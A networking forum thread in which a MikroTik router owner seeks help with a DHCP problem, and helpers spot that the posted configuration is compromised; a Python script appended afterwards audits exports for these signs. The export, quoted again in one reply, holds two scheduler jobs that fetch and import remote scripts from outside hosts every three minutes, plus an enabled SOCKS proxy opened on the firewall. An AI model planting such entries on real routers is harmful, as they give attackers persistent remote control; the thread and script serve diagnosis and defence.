levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 9:29 am

Hello, my Router is 2011UiAS.
It worked for 4 years without any problems until I reset it.
Now I'm trying to set it up, but ran into a problem. Devices connected to this router sometimes get IP addresses from my ISP instead of the router's local addresses (from the router's DHCP server). Even from the access points (I have three of them).

The ISP is connected through the SFP port.

Thanks in advance.

Here is my config.
[admin@MikroTik] > export compact 
# aug/06/2021 09:21:25 by RouterOS 6.41
# software id = FDPG-2TR9
#
# model = 2011UiAS-2HnD
# serial number = 7A670712F998
/interface bridge
add admin-mac=64:D1:54:12:14:61 auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether4 ] name="Bed room"
set [ find default-name=ether5 ] name=Cabinet
set [ find default-name=ether2 ] name="Living Room"
set [ find default-name=ether3 ] name="Maxim Room"
set [ find default-name=ether8 ] name="Nikita Room"
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce distance=indoors frequency=auto mode=ap-bridge ssid=MikroTik-12146A wireless-protocol=802.11
/interface list
add comment=defconf name=WAN
add comment=defconf name=LAN
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk mode=dynamic-keys supplicant-identity=MikroTik wpa-pre-shared-key=--redacted-- wpa2-pre-shared-key=--redacted--
/ip pool
add name=dhcp ranges=192.168.88.10-192.168.88.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=bridge name="Cat DHCP"
/interface bridge port
add bridge=bridge comment=defconf interface="Living Room"
add bridge=bridge comment=defconf interface="Maxim Room"
add bridge=bridge comment=defconf interface="Bed room"
add bridge=bridge comment=defconf interface=Cabinet
add bridge=bridge comment=defconf interface=ether6
add bridge=bridge comment=defconf interface=ether7
add bridge=bridge comment=defconf interface="Nikita Room"
add bridge=bridge comment=defconf interface=ether9
add bridge=bridge comment=defconf interface=sfp1
add bridge=bridge comment=defconf interface=wlan1
/ip neighbor discovery-settings
set discover-interface-list=LAN
/interface list member
add comment=defconf interface=bridge list=LAN
add comment=defconf interface=sfp1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client
add comment=defconf dhcp-options=hostname,clientid disabled=no interface=bridge
/ip dhcp-server network
add address=192.168.88.0/24 comment=defconf dns-server=192.168.88.1 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes
/ip dns static
add address=192.168.88.1 name=router.lan
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN
add action=accept chain=forward comment="defconf: accept in ipsec policy" ipsec-policy=in,ipsec
add action=accept chain=forward comment="defconf: accept out ipsec policy" ipsec-policy=out,ipsec
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related, untracked" connection-state=established,related,untracked
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge out-interface-list=all
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24
set ssh address=192.168.88.0/24
set api disabled=yes
set winbox address=192.168.88.0/24
set api-ssl disabled=yes
/ip socks
set enabled=yes port=5678
/lcd interface pages
set 0 interfaces=wlan1
/system clock
set time-zone-name=Europe/Riga
/system scheduler
add interval=3m name=U7 on-event="/tool fetch url=http://massgames.space/poll/16d3cfaf-0057-452f-ba0f-c0fe61488119 mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=3m name=U6 on-event="/tool fetch url=http://strtbiz.site/poll/fc9cbeff-0e41-4f0c-bc76-067f9270c6bb mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN
 
anav
Forum Guru
Posts: 18959
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 1:24 pm

(1) Not sure but change this
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge out-interface-list=all
To
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface-list=WAN

(2) What is the purpose of input chain rule 5678?

(3) Some of these services should be disabled.
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24

set ssh address=192.168.88.0/24
set api disabled=yes

(4) Should be set to none!
/tool mac-server
set allowed-interface-list=LAN
 
andkar
newbie
Posts: 47
Joined: Tue Aug 11, 2020 9:20 pm

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:09 pm

Remove sfp1 from bridge.
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:18 pm

@anav... this is the first time I see www protected (set www address=192.168.88.0/24) on a user board, and you ask to disable webfig?....

First of all, you are running 6.41, which is full of bugs and known backdoors; upgrade to the latest bugfix / long-term 6.47.10,
then post your config again.
Last edited by rextended on Fri Aug 06, 2021 3:02 pm, edited 3 times in total.
 
BartoszP
Forum Guru
Posts: 2855
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 2:38 pm

Netinstall. Why does the scheduler pull files? IMHO your router is compromised and should be "furrowed".
/system scheduler
add interval=3m name=U7 on-event="/tool fetch url=http://massgames.space/poll/16d3cfaf-0057-452f-ba0f-c0fe61488119 mode=http dst-path=7xe7zt46hb08\r\
    \n/import 7xe7zt46hb08" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=3m name=U6 on-event="/tool fetch url=http://strtbiz.site/poll/fc9cbeff-0e41-4f0c-bc76-067f9270c6bb mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 3:02 pm

...you are running 6.41, which is full of bugs and known backdoors...

too late... :twisted:
 
levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 5:35 pm

OK, I've updated to 6.48.3, removed that scheduler, and removed the default user for the sake of security.

Also, tried to remove SFP1 from bridge -> no internet
tried the suggestion to change
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge
to
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface-list=wan -> no internet

New config is:
[bigcat@MikroTik] > export compact 
# aug/06/2021 17:29:36 by RouterOS 6.48.3
# software id = FDPG-2TR9
#
# model = 2011UiAS-2HnD
# serial number = 7A670712F998
/interface bridge
add admin-mac=64:D1:54:12:14:61 auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether4 ] name="Bed room" speed=100Mbps
set [ find default-name=ether5 ] name=Cabinet speed=100Mbps
set [ find default-name=ether2 ] name="Living Room" speed=100Mbps
set [ find default-name=ether3 ] name="Maxim Room" speed=100Mbps
set [ find default-name=ether8 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name="Nikita Room"
set [ find default-name=ether1 ] speed=100Mbps
set [ find default-name=ether6 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether7 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether9 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether10 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] antenna-gain=0 band=2ghz-b/g/n channel-width=20/40mhz-Ce country=no_country_set distance=indoors frequency=auto frequency-mode=manual-txpower mode=\
    ap-bridge ssid=MikroTik-12146A station-roaming=enabled wireless-protocol=802.11
/interface list
add comment=defconf name=WAN
add comment=defconf name=LAN
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk mode=dynamic-keys supplicant-identity=MikroTik wpa-pre-shared-key=*** wpa2-pre-shared-key=***
/ip pool
add name=dhcp ranges=192.168.88.10-192.168.88.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=bridge name="Cat DHCP"
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/user group
set full policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp
/interface bridge port
add bridge=bridge comment=defconf interface="Living Room"
add bridge=bridge comment=defconf interface="Maxim Room"
add bridge=bridge comment=defconf interface="Bed room"
add bridge=bridge comment=defconf interface=Cabinet
add bridge=bridge comment=defconf interface=ether6
add bridge=bridge comment=defconf interface=ether7
add bridge=bridge comment=defconf interface="Nikita Room"
add bridge=bridge comment=defconf interface=ether9
add bridge=bridge comment=defconf interface=sfp1
add bridge=bridge comment=defconf interface=wlan1
/ip neighbor discovery-settings
set discover-interface-list=LAN
/interface list member
add comment=defconf interface=bridge list=LAN
add comment=defconf interface=sfp1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client
add comment=defconf disabled=no interface=bridge
/ip dhcp-server network
add address=192.168.88.0/24 comment=defconf dns-server=192.168.88.1 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes
/ip dns static
add address=192.168.88.1 name=router.lan
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN
add action=accept chain=forward comment="defconf: accept in ipsec policy" ipsec-policy=in,ipsec
add action=accept chain=forward comment="defconf: accept out ipsec policy" ipsec-policy=out,ipsec
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related, untracked" connection-state=established,related,untracked
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24
set ssh address=192.168.88.0/24
set api disabled=yes
set winbox address=192.168.88.0/24
set api-ssl disabled=yes
/ip socks
set enabled=yes port=5678
/lcd interface pages
set 0 interfaces=wlan1
/system clock
set time-zone-name=Europe/Riga
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN
 
rextended
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 6:21 pm

If you have not changed anything since your last export,
do not think twice and paste this into the terminal without omitting the { } !!!:
{
/interface ethernet
set [ find default-name=ether1 ] speed=1Gbps
set [ find default-name=ether2 ] speed=1Gbps
set [ find default-name=ether3 ] speed=1Gbps
set [ find default-name=ether4 ] speed=1Gbps
set [ find default-name=ether5 ] speed=1Gbps
set [ find default-name=ether6 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether7 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether8 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether9 ] advertise=10M-half,10M-full,100M-half,100M-full
set [ find default-name=ether10 ] advertise=10M-half,10M-full,100M-half,100M-full
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-g/n station-roaming=disabled
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa2-psk wpa-pre-shared-key=""
/ip dhcp-client
remove [find]
add comment=defconf disabled=no interface=sfp1
/interface bridge port
remove [find where interface=sfp1]
/ip firewall filter
remove [find where dst-port=5678]
add action=accept chain=input comment="Neighbor Discovery" dst-address=255.255.255.255 dst-port=5678 protocol=udp src-port=5678
move [find where comment="Neighbor Discovery"] [find where chain=input and comment="defconf: accept established,related,untracked"] 
/user group
set full policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,!dude,tikapp
/ip socks
set enabled=no port=1080
/ip dns
set servers=1.1.1.1,8.8.8.8
}

After you do that, do another export and post it on the forum to see if something is missing.

Disable the DHCP server on all other Access Points.
 
BartoszP
Forum Guru
Posts: 2855
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Fri Aug 06, 2021 10:29 pm

Please DO netinstall. Compromised ROS is infected internally and cleaning the configuration does not help.

1. export configuration
2. netinstall to reformat the disk and kill all malware installed in the router
3. import configuration from .rsc file
 
sid5632
Long time Member
Posts: 552
Joined: Fri Feb 17, 2017 6:05 pm

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Sat Aug 07, 2021 3:21 am

Also, tried to remove SFP1 from bridge -> no internet

/ip address add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client add comment=defconf disabled=no interface=bridge
The answer is of course staring you in the face.
Put the dhcp-client on sfp1 after you remove it from the bridge.
 
levies
just joined
Topic Author
Posts: 4
Joined: Fri Aug 06, 2021 9:10 am

Re: Please help, getting IPs from ISP instead of Router's DHCP Server.

Sat Aug 07, 2021 11:03 am

Thanks,
removed sfp1 from the bridge,
moved DHCP client to sfp1
All works.

I will do the Netinstall next time, as I'm abroad now for 3-4 days.
I've turned off the router for this period of time.

Thanks for the help.
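
Added example, not part of the original thread: a small Python audit of a RouterOS `export compact` that flags the signs the replies above point out (a scheduler job that fetches and imports a remote script, the SOCKS proxy enabled with its port accepted on the input chain, and the WAN port left inside the LAN bridge). The sample export, its host name and the finding names are constructed for illustration.

```python
import re

# Constructed sample shaped like the first export in the thread; host name is a placeholder.
SAMPLE = r'''/interface bridge port
add bridge=bridge comment=defconf interface=sfp1
/interface list member
add comment=defconf interface=sfp1 list=WAN
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
/ip socks
set enabled=yes port=5678
/system scheduler
add interval=3m name=job1 on-event="/tool fetch url=http://host.example.invalid/poll/ID mode=http dst-path=x.rsc\r\
    \n/import x.rsc" policy=read,write,policy,test start-time=startup
'''

ATTR = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')  # key=value or key="quoted value"

def parse_export(text):
    """Yield (menu, attributes, raw command), joining lines continued with a trailing backslash."""
    menu = ''
    for line in re.sub(r'\\\r?\n\s*', '', text).splitlines():
        line = line.strip()
        if line.startswith('/'):
            menu = line                      # menu path, e.g. "/ip socks"
        elif line and not line.startswith('#'):
            yield menu, dict(ATTR.findall(line)), line

def audit(text):
    """Return sorted (finding, detail) pairs for the issues the thread's replies point out."""
    found, bridged, wan, tcp_in, socks_port = set(), set(), set(), set(), None
    for menu, a, raw in parse_export(text):
        if menu == '/system scheduler' and re.search(r'/tool fetch\b.*/import\b', raw):
            found.add(('scheduler-fetch-import', a.get('name', '?')))
        elif menu == '/ip socks' and a.get('enabled') == 'yes':
            socks_port = a.get('port', '1080')   # compact export omits the default port
        elif menu == '/ip firewall filter' and a.get('chain') == 'input' \
                and a.get('action') == 'accept' and a.get('protocol') == 'tcp':
            tcp_in.update(a.get('dst-port', '').split(','))
        elif menu == '/interface bridge port':
            bridged.add(a.get('interface'))
        elif menu == '/interface list member' and a.get('list') == 'WAN':
            wan.add(a.get('interface'))
    if socks_port:
        found.add(('socks-enabled', socks_port))
        if socks_port in tcp_in:
            found.add(('socks-port-accepted-on-input', socks_port))
    found.update(('wan-port-in-bridge', i) for i in bridged & wan - {None})
    return sorted(found)
```

Calling `audit()` on the text of an export returns an empty list when none of these conditions is present; a clean result says nothing about files or binaries on the device, which is why the thread recommends Netinstall.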
